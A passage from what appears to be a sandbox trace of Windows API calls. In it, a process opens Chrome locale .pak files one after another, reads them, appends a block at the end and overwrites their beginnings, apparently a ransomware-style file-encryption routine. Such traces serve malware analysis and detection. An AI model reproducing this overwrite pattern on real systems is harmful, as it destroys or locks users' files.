nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0118.331] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ef30000 [0118.365] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0118.365] VirtualQuery (in: lpAddress=0x7ef80000, lpBuffer=0x359f23c, dwLength=0x1c | out: lpBuffer=0x359f23c*(BaseAddress=0x7ef80000, AllocationBase=0x7ef80000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0118.365] VirtualAlloc (lpAddress=0x0, dwSize=0x70000, flAllocationType=0x101000, flProtect=0x4) returned 0x7eec0000 [0118.384] VirtualFree (lpAddress=0x7ef30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.387] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0118.389] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0118.392] VirtualQuery (in: lpAddress=0x7ef30000, lpBuffer=0x359f23c, dwLength=0x1c | out: lpBuffer=0x359f23c*(BaseAddress=0x7ef30000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0118.392] VirtualAlloc (lpAddress=0x7ef30000, dwSize=0x20000, flAllocationType=0x2000, flProtect=0x4) returned 0x7ef30000 [0118.392] VirtualAlloc (lpAddress=0x7ef30000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x7ef30000 [0118.395] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.397] SetFilePointer (in: hFile=0x204, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9a7480 [0118.397] ReadFile (in: hFile=0x204, lpBuffer=0x1ea7b88, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0118.598] SetFilePointer (in: hFile=0x204, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9a7480 [0118.624] VirtualAlloc (lpAddress=0x0, dwSize=0xa0000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ee20000 [0118.646] VirtualQuery (in: lpAddress=0x7eec0000, lpBuffer=0x359f2b0, dwLength=0x1c | out: lpBuffer=0x359f2b0*(BaseAddress=0x7eec0000, AllocationBase=0x7eec0000, AllocationProtect=0x4, RegionSize=0x70000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0118.646] VirtualFree (lpAddress=0x7eec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.650] VirtualQuery (in: lpAddress=0x7ef30000, lpBuffer=0x359f2b0, dwLength=0x1c | out: lpBuffer=0x359f2b0*(BaseAddress=0x7ef30000, AllocationBase=0x7ef30000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0118.650] VirtualFree (lpAddress=0x7ef30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.651] WriteFile (in: hFile=0x204, lpBuffer=0x1ea7b88*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesWritten=0x359f28c*=0x2588, lpOverlapped=0x0) returned 1 [0118.651] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0118.651] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0118.651] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0118.652] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0118.652] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0118.653] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0118.653] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0118.653] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0118.654] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0118.654] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.654] VirtualFree (lpAddress=0x7ee20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.658] CloseHandle (hObject=0x204) returned 1 [0118.659] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\cs.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\cs.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0118.660] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0118.660] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x51809 [0118.660] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0118.660] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.660] ReleaseMutex (hMutex=0x168) returned 1 [0118.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cs.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0118.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cs.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cs.pak", lpUsedDefaultChar=0x0) returned 6 [0118.660] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0119.263] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x50809 [0119.263] ReadFile (in: hFile=0x204, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0119.278] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x50809 [0119.278] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0119.278] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0119.278] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0119.278] CloseHandle (hObject=0x204) returned 1 [0119.278] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\et.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\et.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0119.279] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0119.279] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x469ee [0119.280] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0119.280] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.280] ReleaseMutex (hMutex=0x168) returned 1 [0119.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="et.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0119.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="et.pak", cchWideChar=6, lpMultiByteStr=0x1f7accc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="et.pak", lpUsedDefaultChar=0x0) returned 6 [0119.280] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0119.283] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x459ee [0119.283] ReadFile (in: hFile=0x204, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0119.287] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x459ee [0119.288] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0119.288] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0119.288] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0119.288] CloseHandle (hObject=0x204) returned 1 [0119.288] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hr.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0119.289] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0119.290] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4bc57 [0119.290] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0119.290] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.290] ReleaseMutex (hMutex=0x168) returned 1 [0119.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hr.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0119.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hr.pak", cchWideChar=6, lpMultiByteStr=0x1f7accc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hr.pak", lpUsedDefaultChar=0x0) returned 6 [0119.290] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0119.292] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4ac57 [0119.292] ReadFile (in: hFile=0x204, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0119.294] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4ac57 [0119.295] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0119.296] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0119.296] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0119.296] CloseHandle (hObject=0x204) returned 1 [0119.296] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lv.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\lv.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0119.297] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0119.298] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x51fd0 [0119.298] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0119.298] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.298] ReleaseMutex (hMutex=0x168) returned 1 [0119.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lv.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0119.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lv.pak", cchWideChar=6, lpMultiByteStr=0x1f7accc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lv.pak", lpUsedDefaultChar=0x0) returned 6 [0119.298] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0119.300] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x50fd0 [0119.300] ReadFile (in: hFile=0x204, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0119.302] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x50fd0 [0119.303] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0119.303] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0119.304] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0119.304] CloseHandle (hObject=0x204) returned 1 [0119.304] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-PT.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pt-pt.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0119.305] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0119.305] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4f596 [0119.305] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0119.305] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.305] ReleaseMutex (hMutex=0x168) returned 1 [0119.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pt-PT.pak", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0119.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pt-PT.pak", cchWideChar=9, lpMultiByteStr=0x1f7356c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pt-PT.pak", lpUsedDefaultChar=0x0) returned 9 [0119.305] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0119.308] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4e596 [0119.308] ReadFile (in: hFile=0x204, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0119.310] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4e596 [0119.310] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0119.311] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0119.311] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0119.311] CloseHandle (hObject=0x204) returned 1 [0119.311] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ta.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ta.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0119.312] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0119.312] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xbcd4e [0119.313] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0119.313] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.313] ReleaseMutex (hMutex=0x168) returned 1 [0119.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ta.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0119.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ta.pak", cchWideChar=6, lpMultiByteStr=0x1f7accc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ta.pak", lpUsedDefaultChar=0x0) returned 6 [0119.313] ReadFile (in: hFile=0x204, lpBuffer=0x2897978, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2897978*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0119.316] ReadFile (in: hFile=0x204, lpBuffer=0x2897978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2897978*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0119.696] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xbbd4e [0119.696] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0119.704] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xbbd4e [0119.705] WriteFile (in: hFile=0x204, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, 